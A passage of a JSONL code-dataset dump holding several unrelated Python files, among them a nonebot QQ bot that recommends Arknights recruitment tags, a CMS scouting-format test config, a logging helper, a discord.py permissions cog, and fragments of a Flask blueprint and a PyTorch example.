leimauksen avaimessa on joukkueen id...\n # nykyisellä toteutustavalla tällä ei kuitenkaan ole merkitystä\n ds.poista_joukkue(joukkue_id, vanha_sarja_id, kilpailu_id)\n joukkue_dict['lisaaja'] = joukkue['lisaaja']\n joukkue_dict['leimaukset'] = joukkue['leimaukset']\n ds.lisaa_joukkue(joukkue_dict, sarja_id, kilpailu_id)\n \n return redirect(url_for('joukkueet.listaa'))\n\n # näytetään joukkueen muokkaussivu\n # (samaa pohjaa käytetään monessa yhteydessä, sivun sisältö määritetään roolin ja moodin perusteella)\n return render_template('joukkueet/form.html',\n form=form,\n mode='muokkaa',\n action_url=url_for('joukkueet.muokkaa'))\n\n\n######### APUFUNKTIOT ############\n\ndef _hae_kaikki_tiedot() -> dict:\n # haetaan datastoresta kaikki entityt\n kilpailut = ds.hae_kilpailut()\n sarjat = ds.hae_sarjat()\n rastit = ds.hae_rastit()\n joukkueet = ds.hae_joukkueet()\n\n kayttaja = session.get('kayttaja')\n valittu_kilpailu = session.get('kilpailu')\n\n # lisätään kilpailut hakemistoon, jossa tiedot palautetaan\n dict_kilpailut = {kilpailu.id:{key:kilpailu[key] for key in kilpailu.keys()} for kilpailu in kilpailut}\n\n # iteroidaan kilpailut läpi ja lisätään niihin kuuluvat sarjat, rastit ja joukkueet alihakemistoina\n # ratkaisu ei ole järin tehokas, mutta aivan riittävä tälle datan määrälle ja mukavan suoraviivainen\n for kilpailu_id, kilpailu in dict_kilpailut.items():\n kilpailu['sarjat'] = {sarja.id:{key:sarja[key] for key in sarja.keys()} for sarja in sarjat if sarja.key.parent.id == kilpailu_id}\n kilpailu['rastit'] = {rasti.id:{key:rasti[key] for key in rasti.keys()} for rasti in rastit if rasti.key.parent.id == kilpailu_id}\n\n # tallennetaan valitun kilpailun rastien tietoihin lupa muokata, jos ollaan admin-tilassa\n for rasti in kilpailu['rastit'].values():\n rasti['saa_muokata'] = ('admin' in kayttaja['roolit'] and kilpailu_id == valittu_kilpailu)\n\n for sarja_id, sarja in kilpailu['sarjat'].items():\n # lisätään joukkueet sarjakohtaisesti\n sarja['joukkueet'] = {joukkue.id:{key:joukkue[key] for key in joukkue.keys()} for joukkue in joukkueet if joukkue.key.parent.id == sarja_id}\n for joukkue in sarja['joukkueet'].values():\n\n # tallennetaan joukkueiden tietoihin lupa muokata, jos ollaan oikean kilpailun admin-tilassa tai joukkueen lisääjä\n joukkue['saa_muokata'] = ('admin' in kayttaja['roolit'] and kilpailu_id == valittu_kilpailu\n or joukkue['lisaaja'] == kayttaja['email'])\n \n # muunnetaan helpompaa käsittelyä varten leimausten id kokonaisluvuksi ja aikaleima merkkijonoksi\n leimaukset = {int(key): value.strftime(\"%Y-%m-%d %H:%M:%S\") for key, value in sorted(joukkue['leimaukset'].items(), key=lambda item: item[1])}\n joukkue['leimaukset'] = leimaukset\n \n return dict_kilpailut","sub_path":"vt4/tupa/modules/blueprints/joukkueet.py","file_name":"joukkueet.py","file_ext":"py","file_size_in_byte":10089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"653324476","text":"from nonebot import on_command, CommandSession\r\nfrom nonebot import on_natural_language, NLPSession, IntentCommand\r\nimport requests\r\nfrom html import unescape\r\nfrom lxml import html\r\nimport os, sys\r\n\r\no_path = os.getcwd()\r\no_path=o_path+\"/akaisora/plugins/\"\r\nsys.path.append(o_path)\r\n\r\nfrom ocr_tool import Ocr_tool\r\n\r\npath_prefix=\"./akaisora/plugins/\"\r\n# path_prefix=\"\"\r\n\r\n# some comments below is from the demo code of nonebot\r\n\r\n# on_command 装饰器将函数声明为一个命令处理器\r\n# 这里 weather 
为命令的名字,同时允许使用别名「天气」「天气预报」「查天气」\r\n@on_command('tagrc', aliases=(), only_to_me=False)\r\nasync def tagrc(session: CommandSession):\r\n # 从会话状态(session.state)中获取城市名称(city),如果当前不存在,则询问用户\r\n # tags = session.get('tags', prompt='输入tag列表,空格隔开')\r\n tags=session.state['tags'] if 'tags' in session.state else None\r\n images=session.state['images'] if 'images' in session.state else None\r\n if not tags and not images:return\r\n # 获取城市的天气预报\r\n tagrc_report = await get_recomm_tags(tags=tags,images=images)\r\n if tagrc_report is None: return \r\n # 向用户发送天气预报\r\n await session.send(tagrc_report)\r\n \r\n@on_command('hello', aliases=(), only_to_me=True)\r\nasync def hello(session: CommandSession):\r\n\r\n info_msg=\"\"\"明日方舟 公开招募助手机器人\r\n用法:\r\n1.输入词条列表,空格隔开\r\n 如: 近卫 男\r\n2.发送招募词条截图\r\n \r\n3.tell 干员名称\r\n 如: tell 艾雅法拉\r\nGithub链接: https://github.com/Akaisorani/QQ-bot-Arknights-Helper\"\"\"\r\n\r\n await session.send(info_msg)\r\n \r\n@on_command('update_data', aliases=(), only_to_me=True)\r\nasync def update_data(session: CommandSession):\r\n\r\n tags_recom.char_data.fetch_data()\r\n tags_recom.char_data.extract_all_char(text_file=path_prefix+\"chardata.html\")\r\n \r\n \r\n info_msg=\"update done\"\r\n\r\n await session.send(info_msg)\r\n \r\n@on_command('tell', aliases=(), only_to_me=False)\r\nasync def tell(session: CommandSession):\r\n name=session.state['name'] if 'name' in session.state else None\r\n if not name :return\r\n # 获取城市的天气预报\r\n tell_report = await get_peo_info(name=name)\r\n if tell_report is None: return \r\n # 向用户发送天气预报\r\n await session.send(tell_report)\r\n\r\n# weather.args_parser 装饰器将函数声明为 weather 命令的参数解析器\r\n# 命令解析器用于将用户输入的参数解析成命令真正需要的数据\r\n@tagrc.args_parser\r\nasync def _(session: CommandSession):\r\n # 去掉消息首尾的空白符\r\n stripped_arg = session.current_arg_text.strip()\r\n images_arg=session.current_arg_images\r\n \r\n print(\"stripped_arg\", stripped_arg)\r\n print(\"images_arg\", images_arg)\r\n if session.is_first_run:\r\n # 该命令第一次运行(第一次进入命令会话)\r\n if stripped_arg:\r\n # 第一次运行参数不为空,意味着用户直接将城市名跟在命令名后面,作为参数传入\r\n # 例如用户可能发送了:天气 南京\r\n session.state['tags'] = stripped_arg\r\n elif images_arg:\r\n session.state['images'] = images_arg\r\n return\r\n\r\n # if not stripped_arg:\r\n # # 用户没有发送有效的城市名称(而是发送了空白字符),则提示重新输入\r\n # # 这里 session.pause() 将会发送消息并暂停当前会话(该行后面的代码不会被运行)\r\n # session.pause('输入错误,请重新输入')\r\n\r\n # 如果当前正在向用户询问更多信息(例如本例中的要查询的城市),且用户输入有效,则放入会话状态\r\n # session.state[session.current_key] = stripped_arg\r\n\r\n# on_natural_language 装饰器将函数声明为一个自然语言处理器\r\n# keywords 表示需要响应的关键词,类型为任意可迭代对象,元素类型为 str\r\n# 如果不传入 keywords,则响应所有没有被当作命令处理的消息\r\n@on_natural_language(only_to_me=False, keywords=None)\r\nasync def _(session: NLPSession):\r\n\r\n # stripped_msg = session.msg_text.strip()\r\n msg=session.msg\r\n\r\n # 返回意图命令,前两个参数必填,分别表示置信度和意图命令名\r\n return IntentCommand(90.0, 'tagrc', current_arg=msg or '')\r\n \r\n@tell.args_parser\r\nasync def _(session: CommandSession):\r\n # 去掉消息首尾的空白符\r\n stripped_arg = session.current_arg_text.strip()\r\n \r\n print(\"tell stripped_arg\", stripped_arg)\r\n if session.is_first_run:\r\n # 该命令第一次运行(第一次进入命令会话)\r\n if stripped_arg:\r\n # 第一次运行参数不为空,意味着用户直接将城市名跟在命令名后面,作为参数传入\r\n # 例如用户可能发送了:天气 南京\r\n session.state['name'] = stripped_arg\r\n return\r\n\r\n\r\nasync def get_recomm_tags(tags: str, images: list) -> str:\r\n # 这里简单返回一个字符串\r\n # 实际应用中,这里应该调用返回真实数据的天气 API,并拼接成天气预报内容\r\n tags_list=tags.split() if tags else []\r\n report=tags_recom.recom(tags_list, images)\r\n \r\n return report\r\n \r\nasync def get_peo_info(name: str) -> str:\r\n # 
这里简单返回一个字符串\r\n # 实际应用中,这里应该调用返回真实数据的天气 API,并拼接成天气预报内容\r\n report=tags_recom.char_data.get_peo_info(name)\r\n \r\n return report\r\n\r\n\r\nclass Character(object):\r\n def __init__(self):\r\n self.char_data=dict()\r\n self.head_data=[]\r\n self.head_key_map={\r\n \"职业\":\"job\",\r\n \"星级\":\"rank\",\r\n \"性别\":\"sex\",\r\n \"阵营\":\"affiliation\",\r\n \"标签\":\"tags\",\r\n \"获取途径\":\"obtain_method\"\r\n }\r\n \r\n def extract_all_char(self, text_string=None, text_file=None, head_file=None):\r\n if text_file is None:text_file=path_prefix+\"chardata.html\" \r\n if head_file is None:head_file=path_prefix+\"data_head.html\" \r\n if not os.path.exists(text_file) or not os.path.exists(head_file):\r\n self.fetch_data()\r\n if text_string is None:\r\n with open(text_file,encoding='UTF-8') as fp:\r\n text_string=fp.read()\r\n with open(head_file,encoding='UTF-8') as fp:\r\n head_string=fp.read()\r\n self.head_data=head_string.split(',')\r\n\r\n tree=html.fromstring(text_string)\r\n char_res_lis=tree.xpath(\"//tr\")\r\n \r\n self.char_data=dict()\r\n for char_tr in char_res_lis:\r\n name=char_tr.xpath(\"./td[2]/a[1]/text()\")[0]\r\n self.char_data[name]=dict()\r\n self.char_data[name][\"job\"]=char_tr.xpath(\"./@data-param1\")[0]\r\n self.char_data[name][\"rank\"]=char_tr.xpath(\"./@data-param2\")[0].split(\",\")[0]\r\n self.char_data[name][\"sex\"]=char_tr.xpath(\"./@data-param3\")[0]\r\n self.char_data[name][\"affiliation\"]=char_tr.xpath(\"./@data-param4\")[0]\r\n tag_string=char_tr.xpath(\"./@data-param5\")[0]+\", \" \\\r\n +self.char_data[name][\"sex\"]+\", \" \\\r\n +self.char_data[name][\"job\"]+\", \" \\\r\n +(\"资深干员\" if self.char_data[name][\"rank\"]==\"5\" else \"\")+\", \" \\\r\n +(\"高级资深干员\" if self.char_data[name][\"rank\"]==\"6\" else \"\")+\", \"\r\n taglist=[x.strip() for x in tag_string.split(\",\")]\r\n taglist=[x for x in taglist if x!=\"\"]\r\n self.char_data[name][\"tags\"]=taglist\r\n self.char_data[name][\"obtain_method\"]=list(map(lambda x: x.strip(), char_tr.xpath(\"./@data-param6\")[0].split(\",\")))\r\n \r\n #deal head and data\r\n td_lis=char_tr.xpath(\".//td\")\r\n text_lis=[\"\".join([xx.strip() for xx in x.xpath(\".//text()\")]) for x in td_lis]\r\n all_lis=[x.strip() for x in text_lis]\r\n self.char_data[name][\"all\"]=all_lis\r\n \r\n def filter(self, tags):\r\n tags=tags[:]\r\n ranks=self.gen_ranks(tags)\r\n for name, dic in self.char_data.items():\r\n if set(tags).issubset(set(dic[\"tags\"])) and \"公开招募\" in dic[\"obtain_method\"] and dic[\"rank\"] in ranks:\r\n yield name\r\n \r\n def gen_ranks(self, tags):\r\n ranks=[\"1\",\"2\",\"3\",\"4\",\"5\",\"6\"]\r\n for i in range(1,7):\r\n if \">={0}\".format(i) in tags:\r\n ranks=[x for x in ranks if x>=str(i)]\r\n tags.remove(\">={0}\".format(i))\r\n if \"<={0}\".format(i) in tags:\r\n ranks=[x for x in ranks if x<=str(i)]\r\n tags.remove(\"<={0}\".format(i))\r\n if \"高级资深干员\" not in tags:\r\n ranks.remove(\"6\")\r\n if \"资深干员\" in tags:\r\n ranks=[\"5\"]\r\n if \"高级资深干员\" in tags:\r\n ranks=[\"6\"]\r\n return ranks\r\n \r\n def get_peo_info(self, name=None):\r\n if not name or name not in self.char_data:\r\n return None\r\n res=[]\r\n for tp, cont in zip(self.head_data,self.char_data[name]['all']):\r\n if tp:\r\n if tp==\"干员代号\":tp=\"��名\"\r\n res.append(\"{0}: {1}\".format(tp,cont))\r\n return \"\\n\".join(res)\r\n \r\n def fetch_data(self):\r\n r=requests.get(\"http://wiki.joyme.com/arknights/干员数据表\")\r\n tree=html.fromstring(r.text)\r\n \r\n # people data\r\n people_list=tree.xpath(\"//tr[@data-param1]\")\r\n 
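        # The xpath above keys on the data-param1 attribute that marks
        # operator rows on the wiki page at the time of writing; if the page
        # layout changes, this scrape breaks silently.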
res=\"\".join([unescape(html.tostring(peo).decode('utf-8')) for peo in people_list])\r\n \r\n with open(path_prefix+\"chardata.html\",\"w\",encoding='utf-8') as fp:\r\n fp.write(res)\r\n \r\n # table head data\r\n tb_head=tree.xpath(\"//table[@id='CardSelectTr']//th/text()\")\r\n tb_head=[x.strip() for x in tb_head]\r\n with open(path_prefix+\"data_head.html\",\"w\",encoding='utf-8') as fp:\r\n fp.write(\",\".join(tb_head))\r\n \r\nclass Tags_recom(object):\r\n def __init__(self):\r\n self.char_data=Character()\r\n self.char_data.extract_all_char(text_file=path_prefix+\"chardata.html\")\r\n self.all_tags={\r\n '狙击', '术师', '特种', '重装', '辅助', '先锋', '医疗', '近卫',\r\n '减速', '输出', '生存', '群攻', '爆发', '召唤', '快速复活','费用回复',\r\n '新手', '治疗', '防护', '位移', '削弱', '控场', '支援',\r\n '近战位', '远程位',\r\n '近战', '远程',\r\n '资深干员','高级资深干员', \r\n '女', '男',\r\n '女性', '男性',\r\n '狙击干员', '术师干员', '特种干员', '重装干员', '辅助干员', '先锋干员', '医疗干员', '近卫干员',\r\n '女性干员', '男性干员'\r\n } \r\n \r\n self.ocr_tool=Ocr_tool()\r\n \r\n def recom_tags(self, tags):\r\n tags=self.strip_tags(tags)\r\n \r\n itertag=self.iter_all_combine(tags)\r\n if itertag is None:return []\r\n cob_lis=list(itertag)\r\n cob_lis.remove([])\r\n cob_lis=[(tags_lis, list(self.char_data.filter(tags_lis))) for tags_lis in cob_lis]\r\n cob_lis=[x for x in cob_lis if x[1]!=[]]\r\n \r\n # print(\"\")\r\n # for x in cob_lis:\r\n # print(x)\r\n \r\n # remove same result\r\n for i in range(0,len(cob_lis)):\r\n for j in range(0,len(cob_lis)):\r\n if i==j:continue\r\n if set(cob_lis[i][1])==set(cob_lis[j][1]):\r\n if set(cob_lis[i][0]).issubset(set(cob_lis[j][0])):\r\n cob_lis[i]=(cob_lis[i][0],[])\r\n cob_lis=[x for x in cob_lis if x[1]!=[]]\r\n # print(\"\")\r\n # for x in cob_lis:\r\n # print(x)\r\n \r\n # special remove\r\n for i in range(len(cob_lis)):\r\n if self.is_special_rm(cob_lis[i]):\r\n cob_lis[i]=(cob_lis[i][0],[])\r\n cob_lis=[x for x in cob_lis if x[1]!=[]]\r\n # print(\"\")\r\n # for x in cob_lis:\r\n # print(x) \r\n \r\n # sort\r\n cob_lis.sort(key=self.avg_rank, reverse=True)\r\n for tags_lis, lis in cob_lis:\r\n lis.sort(key=lambda x:self.char_data.char_data[x][\"rank\"], reverse=True)\r\n # print(\"\")\r\n # for x in cob_lis:\r\n # print(x)\r\n \r\n # for x in cob_lis:\r\n # print(self.avg_rank(x))\r\n \r\n # # build reverse index\r\n # char_dic=dict()\r\n # for i in range(len(cob_lis)):\r\n # for name in cob_lis[i][1]:\r\n # if name not in char_dic:\r\n # char_dic[name]=[i]\r\n # else:\r\n # char_dic[name].append(i)\r\n # # print(\"\")\r\n # # print(char_dic)\r\n \r\n # # remove duplicate\r\n # min_size_id=dict()\r\n # for name, lis in char_dic.items():\r\n # if len(lis)>1:\r\n # min_size_id[name]=lis[0]\r\n # for id in lis:\r\n # if len(cob_lis[id][1])1: \r\n # for id in lis:\r\n # if id!=min_size_id[name]:\r\n # cob_lis[id][1].remove(name)\r\n # cob_lis=[x for x in cob_lis if x[1]!=[]]\r\n # # print(\"\")\r\n # # for x in cob_lis:\r\n # # print(x)\r\n \r\n #merge less rank 3\r\n for tags_lis, lis in cob_lis:\r\n cnt=0\r\n sp_lis=[]\r\n while len(lis)>0 and self.char_data.char_data[lis[-1]][\"rank\"]<=\"3\":\r\n res=lis.pop()\r\n if res==\"Castle-3\":\r\n sp_lis.append(res)\r\n else:\r\n cnt+=1\r\n \r\n if len(sp_lis)>0:\r\n lis.extend(sp_lis)\r\n if cnt>0 and len(lis)>0:\r\n lis.append(\"...{0}\".format(cnt))\r\n cob_lis=[x for x in cob_lis if x[1]!=[]]\r\n \r\n return cob_lis\r\n # print(\"\")\r\n # for x in cob_lis:\r\n # print(x) \r\n \r\n \r\n \r\n def is_special_rm(self, cob_i):\r\n if set(cob_i[0])==set([\"女\"]):\r\n return True\r\n # if 
set(cob_i[0])==set([\"男\"]):\r\n # return True\r\n return False\r\n \r\n def avg_rank(self, cob_i):\r\n rank_map={1:0.5, 2:1, 3:3, 4:2, 5:0.5, 6:3}\r\n rank_list=list(map(lambda x:int(self.char_data.char_data[x][\"rank\"]),cob_i[1]))\r\n sum_score=0\r\n sum_cnt=0\r\n for i in range(1,7):\r\n sum_score+=rank_list.count(i)*rank_map[i]*i\r\n sum_cnt+=rank_list.count(i)*rank_map[i]\r\n if sum_cnt==0:return 0\r\n else: return sum_score/sum_cnt\r\n \r\n def strip_tags(self, tags):\r\n restags=[]\r\n for tag in tags:\r\n if tag==\"高级资深干员\" or tag==\"资深干员\":\r\n restags.append(tag)\r\n elif tag==\"近战\" or tag==\"远程\":\r\n restags.append(tag+\"位\")\r\n elif tag==\"男性\" or tag==\"女性\":\r\n tag=tag.replace(\"性\",\"\")\r\n restags.append(tag) \r\n elif \"性干员\" in tag:\r\n tag=tag.replace(\"性干员\",\"\")\r\n restags.append(tag)\r\n elif \"干员\" in tag:\r\n tag=tag.replace(\"干员\",\"\")\r\n restags.append(tag)\r\n else:\r\n restags.append(tag)\r\n return restags\r\n \r\n def iter_all_combine(self, tags):\r\n if len(tags)==0:\r\n yield []\r\n return\r\n tag=tags[0]\r\n new_tags=tags[:]\r\n new_tags.remove(tag)\r\n for x in self.iter_all_combine(new_tags):\r\n yield [tag]+x\r\n for x in self.iter_all_combine(new_tags):\r\n yield x\r\n \r\n def check_legal_tags(self, tags):\r\n if not tags: return False\r\n for tag in tags:\r\n if tag not in self.all_tags:\r\n return False\r\n return True\r\n \r\n def recom(self, tags=None, images=None):\r\n if not tags:\r\n if images:\r\n tags=self.get_tags_from_image(images)\r\n if not tags: return None\r\n else:\r\n return None\r\n \r\n if not self.check_legal_tags(tags):\r\n return None\r\n cob_lis=self.recom_tags(tags)\r\n if not cob_lis:\r\n return \"没有或者太多\"\r\n line_lis=[]\r\n for tags_lis, lis in cob_lis:\r\n new_lis=[]\r\n for x in lis:\r\n if x in self.char_data.char_data:\r\n new_lis.append(x+\"★\"+self.char_data.char_data[x][\"rank\"])\r\n else:\r\n new_lis.append(\"★1~3\"+x)\r\n lef='【'+'+'.join(tags_lis)+\"】:\\n\"\r\n rig=', '.join(new_lis)\r\n line_lis.append(lef+rig)\r\n res=\"\\n\\n\".join(line_lis)\r\n return res\r\n \r\n def get_tags_from_image(self, images):\r\n tags=self.ocr_tool.get_tags_from_url(images[0])\r\n return tags\r\n \r\n \r\n\r\ntags_recom=Tags_recom()\r\n\r\nif __name__==\"__main__\":\r\n filename=\"chardata.html\"\r\n char_data=Character()\r\n char_data.extract_all_char(text_file=filename)\r\n print(char_data.char_data[\"艾雅法拉\"])\r\n \r\n # res=tags_recom.recom([\"狙击干员\",\"辅助干员\", \"削弱\", \"女性干员\", \"治疗\"])\r\n \r\n res=tags_recom.recom([\"近卫\", \"男\", \"支援\"])\r\n print(res)\r\n print(\"=\"*15)\r\n url=\"https://c2cpicdw.qpic.cn/offpic_new/1224067801//39b40a48-b543-4082-986d-f29ee82645d3/0?vuin=2473990407&amp;term=2\"\r\n res=tags_recom.recom(images=[url])\r\n print(res)\r\n \r\n res2=tags_recom.char_data.get_peo_info(\"艾雅法拉\")\r\n print(res2)\r\n \r\n # st=set()\r\n # for name,dic in tags_recom.char_data.char_data.items():\r\n # st=st|set(dic['tags'])\r\n # print(st)\r\n \r\n \r\n\r\n","sub_path":"akaisora/plugins/recom_tags.py","file_name":"recom_tags.py","file_ext":"py","file_size_in_byte":18230,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"245089535","text":"import FWCore.ParameterSet.Config as cms\nimport sys\nimport argparse\n\nparser = argparse.ArgumentParser(prog=sys.argv[0], description='Test Run 2 Scouting data formats')\n\nparser.add_argument(\"--muonVersion\", type=int, help=\"muon data format version (default: 3)\", default=3)\nparser.add_argument(\"--trackVersion\", 
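    # The *Version arguments (here and for muon/vertex) are presumably the
    # persistent class versions the reader should expect; they would need to
    # match whatever the producer configuration wrote.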
type=int, help=\"track data format version (default: 2)\", default=2)\nparser.add_argument(\"--vertexVersion\", type=int, help=\"vertex data format version (default: 3)\", default=3)\nparser.add_argument(\"--inputFile\", type=str, help=\"Input file name (default: testRun2Scouting.root)\", default=\"testRun2Scouting.root\")\nparser.add_argument(\"--outputFileName\", type=str, help=\"Output file name (default: testRun2Scouting2.root)\", default=\"testRun2Scouting2.root\")\nargv = sys.argv[:]\nif '--' in argv:\n argv.remove(\"--\")\nargs, unknown = parser.parse_known_args(argv)\n\nprocess = cms.Process(\"READ\")\n\nprocess.source = cms.Source(\"PoolSource\", fileNames = cms.untracked.vstring(\"file:\"+args.inputFile))\n\nprocess.testReadRun2Scouting = cms.EDAnalyzer(\"TestReadRun2Scouting\",\n # I stick to values exactly convertable to float\n # to avoid potential rounding issues in the test.\n expectedCaloJetsValues = cms.vdouble(\n 2.0, 4.0 , 6.0, 8.0, 10.0,\n 12.0, 14.0, 16.0, 18.0, 20.0,\n 22.0, 24.0, 26.0, 28.0, 30.0,\n 32.0\n ),\n caloJetsTag = cms.InputTag(\"run2ScoutingProducer\", \"\", \"PROD\"),\n expectedElectronFloatingPointValues = cms.vdouble(\n 10.0, 20.0, 30.0, 40.0, 50.0,\n 60.0, 70.0, 80.0, 90.0, 100.0,\n 110.0, 120.0, 130.0, 140.0\n ),\n expectedElectronIntegralValues = cms.vint32(10, 20),\n electronsTag = cms.InputTag(\"run2ScoutingProducer\", \"\", \"PROD\"),\n muonClassVersion = cms.int32(args.muonVersion),\n expectedMuonFloatingPointValues = cms.vdouble(\n 10.0, 20.0, 30.0, 40.0, 50.0,\n 60.0, 70.0, 80.0, 90.0, 100.0,\n 110.0, 120.0, 130.0, 140.0, 150.0,\n 160.0, 170.0, 180.0, 190.0, 200.0,\n 210.0, 220.0, 230.0\n ),\n expectedMuonIntegralValues = cms.vint32(\n 10, 20, 30, 40, 50,\n 60, 70, 80\n ),\n muonsTag = cms.InputTag(\"run2ScoutingProducer\", \"\", \"PROD\"),\n expectedParticleFloatingPointValues = cms.vdouble(\n 11.0, 21.0, 31.0, 41.0\n ),\n expectedParticleIntegralValues = cms.vint32(\n 11, 21\n ),\n particlesTag = cms.InputTag(\"run2ScoutingProducer\", \"\", \"PROD\"),\n expectedPFJetFloatingPointValues = cms.vdouble(\n 12.0, 22.0, 32.0, 42.0, 52.0,\n 62.0, 72.0, 82.0, 92.0, 102.0,\n 112.0, 122.0, 132.0, 142.0, 152.0\n ),\n expectedPFJetIntegralValues = cms.vint32(\n 12, 22, 32, 42, 52,\n 62, 72, 82\n ),\n pfJetsTag = cms.InputTag(\"run2ScoutingProducer\", \"\", \"PROD\"),\n expectedPhotonFloatingPointValues = cms.vdouble(\n 14.0, 23.0, 33.0, 43.0, 53.0,\n 63.0, 73.0, 83.0\n ),\n photonsTag = cms.InputTag(\"run2ScoutingProducer\", \"\", \"PROD\"),\n trackClassVersion = cms.int32(args.trackVersion),\n expectedTrackFloatingPointValues = cms.vdouble(\n 215.0, 225.0, 235.0, 245.0, 255.0,\n 265.0, 275.0, 285.0, 295.0, 305.0,\n 315.0, 325.0, 335.0, 345.0, 355.0,\n 365.0\n ),\n expectedTrackIntegralValues = cms.vint32(\n 52, 62, 72, 82\n ),\n tracksTag = cms.InputTag(\"run2ScoutingProducer\", \"\", \"PROD\"),\n vertexClassVersion = cms.int32(args.vertexVersion),\n expectedVertexFloatingPointValues = cms.vdouble(\n 15.0, 25.0, 35.0, 45.0, 55.0,\n 65.0, 75.0\n ),\n expectedVertexIntegralValues = cms.vint32(\n 12, 22, 32\n ),\n vertexesTag = cms.InputTag(\"run2ScoutingProducer\", \"\", \"PROD\")\n)\n\nprocess.out = cms.OutputModule(\"PoolOutputModule\",\n fileName = cms.untracked.string(args.outputFileName)\n)\n\nprocess.path = cms.Path(process.testReadRun2Scouting)\n\nprocess.endPath = 
cms.EndPath(process.out)\n","sub_path":"DataFormats/Scouting/test/test_readRun2Scouting_cfg.py","file_name":"test_readRun2Scouting_cfg.py","file_ext":"py","file_size_in_byte":3965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"467982983","text":"# coding=utf-8\n\"\"\"utility functions or classes for logging operation\"\"\"\nimport logging\n\nlogging.basicConfig(level=logging.INFO, format=\"<%(name)s> [%(levelname)s] %(message)s\")\n\n\ndef get_default_logger(logger_name_, log_file_=None):\n \"\"\"get default logger with given name\"\"\"\n _logger = logging.getLogger(logger_name_)\n if log_file_:\n _file_handler = logging.FileHandler(log_file_)\n _logger.addHandler(_file_handler)\n return _logger\n","sub_path":"logger_utils.py","file_name":"logger_utils.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"117314555","text":"import functools\nimport typing\n\nimport discord\nfrom discord.ext import commands\n\n\ndef check_perm_exists(func):\n @functools.wraps(func)\n async def wrapper(self, ctx, name, *args):\n if name not in self.bot.perm.registered_permissions:\n await ctx.send(f\"Permission **{name}** does not exist.\")\n return\n\n await func(self, ctx, name, *args)\n\n return wrapper\n\n\ndef _id_to_string(guild, id):\n if id == guild.id:\n return \"@everyone\"\n\n role = guild.get_role(id)\n\n if role is not None:\n return f\"@{role.name}\"\n\n member = guild.get_member(id)\n\n if member is not None:\n return f\"{member}\"\n\n return f\"@{id}\"\n\n\ndef _perm_to_string(perm, guild):\n roleids = [role.id for role in reversed(guild.roles)]\n string = f\"{perm.pretty_name}:\"\n\n defs = perm.definitions(guild)\n\n # List user permissions\n for id, state in defs.items():\n if id in roleids:\n continue\n\n string += f\"\\n - {'Granted' if state else 'Denied'} for {_id_to_string(guild, id)}\"\n\n # List role permissions (in order)\n for id in roleids:\n if id not in defs:\n continue\n\n string += f\"\\n - {'Granted' if defs[id] else 'Denied'} for {_id_to_string(guild, id)}\"\n\n if isinstance(perm.base, str):\n string += f\"\\n - Fallback permission: '{perm.base}' (if none of the above rules match)\"\n else:\n string += f\"\\n - {'Granted' if perm.base is True else 'Denied'} by default (if none of the above rules match)\"\n\n return string\n\n\nclass RoleConverterExt(commands.RoleConverter):\n async def convert(self, ctx, argument):\n if argument == 'everyone':\n return ctx.guild.get_role(ctx.guild.id)\n\n return await super().convert(ctx, argument)\n\n\nclass DBotPerm(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.group(aliases=[\"pm\", \"permission\", \"permissions\"], invoke_without_command=True)\n @commands.has_permissions(administrator=True)\n async def perm(self, ctx):\n \"\"\"Manages the bot-specific permissions\"\"\"\n\n await ctx.send_help(ctx.command)\n return\n\n @perm.command(name=\"list\")\n @commands.has_permissions(administrator=True)\n async def perm_list(self, ctx):\n \"\"\"Lists all available permissions\"\"\"\n\n entries = []\n\n for permname in sorted(self.bot.perm.registered_permissions):\n perm = self.bot.perm.get(permname)\n entries.append({'name': perm.name, 'description': perm.pretty_name})\n\n if len(entries) == 0:\n await ctx.send(\"There aren't any registered permissions.\")\n return\n\n await self.bot.send_table(ctx, [\"name\", \"description\"], entries)\n\n @perm.command(name=\"get\", 
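As a usage note for the `get_default_logger` helper in the logger_utils.py record above, a hedged sketch (the logger name and file path are illustrative):

```python
from logger_utils import get_default_logger

# console output comes from basicConfig's root handler; passing a file path
# additionally mirrors records to that file via an extra FileHandler
logger = get_default_logger("training", log_file_="run.log")
logger.info("starting run")  # console shows: <training> [INFO] starting run
```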
aliases=[\"show\"])\n @commands.has_permissions(administrator=True)\n @check_perm_exists\n async def perm_get(self, ctx, name):\n \"\"\"Retrieves information about a permission\"\"\"\n\n perm = self.bot.perm.get(name)\n await ctx.send(f\"```{_perm_to_string(perm, ctx.guild)}```\")\n\n @perm.command(name=\"grant\", aliases=[\"allow\"])\n @commands.has_permissions(administrator=True)\n @check_perm_exists\n async def perm_grant(self, ctx, permission, target: typing.Union[RoleConverterExt, discord.Member]):\n \"\"\"Grants a permission to a user or role\"\"\"\n\n perm = self.bot.perm.get(permission)\n perm.grant(ctx.guild, target.id)\n\n await ctx.message.add_reaction('\\U00002705')\n\n @perm.command(name=\"deny\", aliases=[\"disallow\"])\n @commands.has_permissions(administrator=True)\n @check_perm_exists\n async def perm_deny(self, ctx, permission, target: typing.Union[RoleConverterExt, discord.Member]):\n \"\"\"Denies a permission to a user or role\"\"\"\n\n perm = self.bot.perm.get(permission)\n perm.deny(ctx.guild, target.id)\n\n await ctx.message.add_reaction('\\U00002705')\n\n @perm.command(name=\"default\", aliases=[\"reset\"])\n @commands.has_permissions(administrator=True)\n @check_perm_exists\n async def perm_default(self, ctx, permission, target: typing.Union[RoleConverterExt, discord.Member]):\n \"\"\"Resets a permission to default for a user or role\"\"\"\n\n perm = self.bot.perm.get(permission)\n perm.default(ctx.guild, target.id)\n\n await ctx.message.add_reaction('\\U00002705')\n\n\ndef setup(bot):\n bot.add_cog(DBotPerm(bot))\n","sub_path":"basedbot/cogs/dbotperm.py","file_name":"dbotperm.py","file_ext":"py","file_size_in_byte":4380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"90236802","text":"import random\nimport torch\n\n\nclass DynamicNet(torch.nn.Module):\n def __init__(self, D_in, H, D_out):\n super(DynamicNet, self).__init__()\n self.input_linear = torch.nn.Linear(D_in, H)\n self.middle_linear = torch.nn.Linear(H, H)\n self.output_linear = torch.nn.Linear(H, D_out)\n\n def forward(self, inputs):\n h_relu = self.input_linear(x).clamp(min=0)\n for i in 